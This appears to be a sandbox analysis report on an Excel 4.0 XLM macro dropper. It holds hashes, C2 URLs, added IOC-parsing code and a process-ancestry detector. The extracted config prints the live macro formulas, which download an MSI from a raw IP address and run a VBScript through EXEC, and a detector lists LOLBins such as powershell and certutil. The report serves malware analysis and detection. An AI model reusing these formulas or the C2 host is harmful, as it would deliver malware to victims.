General

  • Target

    286c28e6219d609162a753d5bb6586d6

  • Size

    6KB

  • Sample

    231221-3my4dsbdfp

  • MD5

    286c28e6219d609162a753d5bb6586d6

  • SHA1

    adfb68e16213829c0a66abf5ee44d707c1e1609e

  • SHA256

    b3a522465d54dc67e872518f6ff471be5b04da67eeed60fba69769cfe003a4c7

  • SHA512

    0200bfd25a922224f163c1ce5d179fb349db1e75bd95d2b179e9c74130bfd37a0980bc05f2166d8d94c20612d48bcee8524d6b9afee7e702ec3a5df6d03d850a

  • SSDEEP

    192:NDStuSDbrA2OmmfR+8UhHFBFYuYb98ykfD+U:N+uYM2wY1FYZb98yyD

Score
10/10
xlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://46.17.98.187/index.php

http://google.com/index.php

Attributes
  • formulas

    =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://46.17.98.187/index.php","C:\~\pes.msi",0,0)
    =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://google.com/index.php","C:\~\pes.msi",0,0)
    =EXEC("wscript C:\zer\spp.vbs")
    =HALT()
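The macro above calls URLDownloadToFileA twice and writes both fetches to the same path, so the second URL on google.com is a fallback or decoy rather than attacker infrastructure; the extractor lists it as C2 only because it surfaces every URL, and it should not go on a blocklist. The =EXEC() line then runs C:\zer\spp.vbs, which none of the listed formulas creates. The parser below is an added example, not the sandbox's own extractor: it turns the formula blob into structured indicators (download URLs, drop paths, executed commands) and uses the CALL() type signature to locate the string parameters generically rather than by hard-coded position. The formula text is copied from the report; the BENIGN_DECOYS allow-list and all function names are this example's assumptions.

```python
"""Parse the XLM formulas listed in this report into structured IOCs.

Added example, not the sandbox's own extractor. The formula blob is copied
verbatim from the "Attributes > formulas" field above; the parsing and the
BENIGN_DECOYS allow-list are this example's assumptions.
"""
import re
from dataclasses import dataclass, field
from urllib.parse import urlparse

REPORT_FORMULAS = (
    r'=CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://46.17.98.187/index.php","C:\~\pes.msi",0,0) '
    r'=CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://google.com/index.php","C:\~\pes.msi",0,0) '
    r'=EXEC("wscript C:\zer\spp.vbs") =HALT()'
)

# Assumption: hosts a dropper contacts only as a fallback or connectivity
# check. They are reported but never proposed as blocking indicators.
BENIGN_DECOYS = {"google.com", "www.google.com"}

FORMULA_RE = re.compile(r"^=([A-Z.]+)\((.*)\)$")


@dataclass
class XlmIocs:
    downloads: list = field(default_factory=list)  # (url, local_path) pairs
    commands: list = field(default_factory=list)   # EXEC() command lines
    halts: bool = False                            # ends with =HALT()


def split_formulas(blob):
    """Split run-together formulas at whitespace that precedes '=NAME'.
    Whitespace inside string literals is not followed by '=', so it is kept."""
    return [f for f in re.split(r"\s+(?==[A-Z])", blob.strip()) if f]


def parse_args(argstr):
    """Tokenise an XLM argument list. Quoted strings (a doubled "" escapes a
    quote) become str, bare integers become int, anything else stays text."""
    args, i, n = [], 0, len(argstr)
    while i < n:
        ch = argstr[i]
        if ch == '"':
            buf, j = [], i + 1
            while j < n:
                if argstr[j] == '"':
                    if j + 1 < n and argstr[j + 1] == '"':
                        buf.append('"')
                        j += 2
                        continue
                    break
                buf.append(argstr[j])
                j += 1
            args.append("".join(buf))
            i = j + 1
        elif ch in ", ":
            i += 1
        else:
            j = argstr.find(",", i)
            j = n if j < 0 else j
            tok = argstr[i:j].strip()
            args.append(int(tok) if re.fullmatch(r"-?\d+", tok) else tok)
            i = j
    return args


def parse_formula(formula):
    m = FORMULA_RE.match(formula.strip())
    if not m:
        raise ValueError(f"not an XLM formula: {formula!r}")
    return m.group(1), parse_args(m.group(2))


def string_params(call_args):
    """For =CALL(dll, func, sig, ...): sig[0] is the return type and sig[k]
    types the k-th parameter ('C' = NUL-terminated string, 'J' = long).
    'JJCCJJ' therefore marks the URL and target path of URLDownloadToFileA."""
    sig, params = call_args[2], call_args[3:]
    return [p for t, p in zip(sig[1:], params) if t == "C"]


def extract_iocs(blob):
    iocs = XlmIocs()
    for formula in split_formulas(blob):
        name, args = parse_formula(formula)
        if name == "CALL" and len(args) >= 3 and args[1] == "URLDownloadToFileA":
            url, path = string_params(args)[:2]
            iocs.downloads.append((url, path))
        elif name == "EXEC" and args:
            iocs.commands.append(str(args[0]))
        elif name == "HALT":
            iocs.halts = True
    return iocs


def is_decoy(url):
    return (urlparse(url).hostname or "").lower() in BENIGN_DECOYS


def summarize(blob):
    """Actionable view of the macro: what it fetches, where it writes, what it runs."""
    iocs = extract_iocs(blob)
    return {
        "download_urls": [u for u, _ in iocs.downloads],
        "block_candidates": [u for u, _ in iocs.downloads if not is_decoy(u)],
        "drop_paths": sorted({p for _, p in iocs.downloads}),
        "commands": iocs.commands,
        "halts": iocs.halts,
    }


if __name__ == "__main__":
    for k, v in summarize(REPORT_FORMULAS).items():
        print(f"{k}: {v}")
```

Running it against the report's formulas yields one block candidate (the 46.17.98.187 URL), one drop path and one command; the same tokenizer handles other CALL() targets because the type signature, not the function name, decides which arguments are strings.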

Extracted

Language   Source          URLs
xlm4.0     xlm40.dropper   http://46.17.98.187/index.php
xlm4.0     xlm40.dropper   http://google.com/index.php

Targets

    • Target

      286c28e6219d609162a753d5bb6586d6

    • Size

      6KB

    • MD5

      286c28e6219d609162a753d5bb6586d6

    • SHA1

      adfb68e16213829c0a66abf5ee44d707c1e1609e

    • SHA256

      b3a522465d54dc67e872518f6ff471be5b04da67eeed60fba69769cfe003a4c7

    • SHA512

      0200bfd25a922224f163c1ce5d179fb349db1e75bd95d2b179e9c74130bfd37a0980bc05f2166d8d94c20612d48bcee8524d6b9afee7e702ec3a5df6d03d850a

    • SSDEEP

      192:NDStuSDbrA2OmmfR+8UhHFBFYuYb98ykfD+U:N+uYM2wY1FYZb98yyD

    Score
    10/10
    • Process spawned unexpected child process

      The parent launched a child it would not normally spawn, which typically indicates the parent was compromised via an exploit or macro. Here that is consistent with the =EXEC("wscript C:\zer\spp.vbs") formula in the extracted config.

    • Process spawned suspicious child process

      A child of this kind is normally only spawned when, for example, the parent process crashes, which typically indicates an unsuccessful compromise attempt.
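The two signatures above reduce to a parent/child process check: an Office process spawning a script host or LOLBin is the macro firing, while an Office process spawning a crash handler points to a failed attempt. The block below is an added example, not the sandbox's detection logic. The events are constructed to resemble Sysmon Event ID 1 (process creation) records and are not this sample's real telemetry; the flagged command line mirrors the =EXEC() formula from the extracted config. The process-name sets and the OFFICE_DIR path are this example's assumptions and would be tuned per environment.

```python
"""Parent/child process check behind the two sandbox signatures above.

Added example, not the sandbox's detection logic. The events are constructed
to resemble Sysmon Event ID 1 (process creation) records and are not this
sample's real telemetry; the flagged command line mirrors the =EXEC() formula
from the extracted config. Process-name sets are this example's assumptions.
"""
import ntpath

OFFICE_PARENTS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}

# Script hosts and LOLBins an Office document has no business launching.
UNEXPECTED_CHILDREN = {
    "wscript.exe", "cscript.exe", "powershell.exe", "cmd.exe", "mshta.exe",
    "rundll32.exe", "regsvr32.exe", "msiexec.exe", "certutil.exe",
}
# Children that mean the parent crashed, i.e. a likely failed compromise
# (the report's "suspicious child process" signature).
CRASH_CHILDREN = {"werfault.exe", "wermgr.exe"}
# Helpers Office spawns on its own; not worth an alert.
EXPECTED_CHILDREN = {"splwow64.exe", "officeclicktorun.exe", "ai.exe"}

OFFICE_DIR = r"C:\Program Files\Microsoft Office\root\Office16"  # assumed install path
SAMPLE_EVENTS = [  # constructed for this example
    {"pid": 4120, "ppid": 3988, "Image": r"C:\Windows\System32\wscript.exe",
     "ParentImage": OFFICE_DIR + r"\EXCEL.EXE",
     "CommandLine": r"wscript C:\zer\spp.vbs"},
    {"pid": 4200, "ppid": 3988, "Image": r"C:\Windows\splwow64.exe",
     "ParentImage": OFFICE_DIR + r"\EXCEL.EXE",
     "CommandLine": r"C:\Windows\splwow64.exe 12288"},
    {"pid": 4300, "ppid": 3988, "Image": r"C:\Windows\System32\WerFault.exe",
     "ParentImage": OFFICE_DIR + r"\EXCEL.EXE",
     "CommandLine": r"C:\Windows\system32\WerFault.exe -u -p 3988 -s 1234"},
    {"pid": 4400, "ppid": 1200, "Image": r"C:\Windows\System32\wscript.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"wscript C:\Users\user\logon.vbs"},
]


def image_name(path):
    """Case-insensitive basename of a Windows path (works on any host OS)."""
    return ntpath.basename(path).lower()


def classify(event):
    """Return a verdict for one process-creation event, or None if benign.

    unexpected_child : Office parent launched a script host / LOLBin
    suspicious_child : Office parent spawned a crash handler
    unknown_child    : Office parent spawned something on neither list
    """
    parent, child = image_name(event["ParentImage"]), image_name(event["Image"])
    if parent not in OFFICE_PARENTS:
        return None
    if child in UNEXPECTED_CHILDREN:
        return "unexpected_child"
    if child in CRASH_CHILDREN:
        return "suspicious_child"
    if child in EXPECTED_CHILDREN:
        return None
    return "unknown_child"


def flag_events(events):
    """Run classify() over a batch and return alert records for the hits."""
    alerts = []
    for e in events:
        verdict = classify(e)
        if verdict:
            alerts.append({
                "verdict": verdict,
                "pid": e["pid"],
                "parent": image_name(e["ParentImage"]),
                "child": image_name(e["Image"]),
                "CommandLine": e["CommandLine"],
            })
    return alerts


if __name__ == "__main__":
    for a in flag_events(SAMPLE_EVENTS):
        print(f'{a["verdict"]:17} {a["parent"]} -> {a["child"]}  {a["CommandLine"]}')
```

Only the EXCEL.EXE -> wscript.exe and EXCEL.EXE -> WerFault.exe events are flagged; the same wscript.exe launched from explorer.exe is ignored, which is why the parent matters more than the child alone. An "unknown_child" verdict is a low-severity triage queue for tuning the lists, not an alert.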
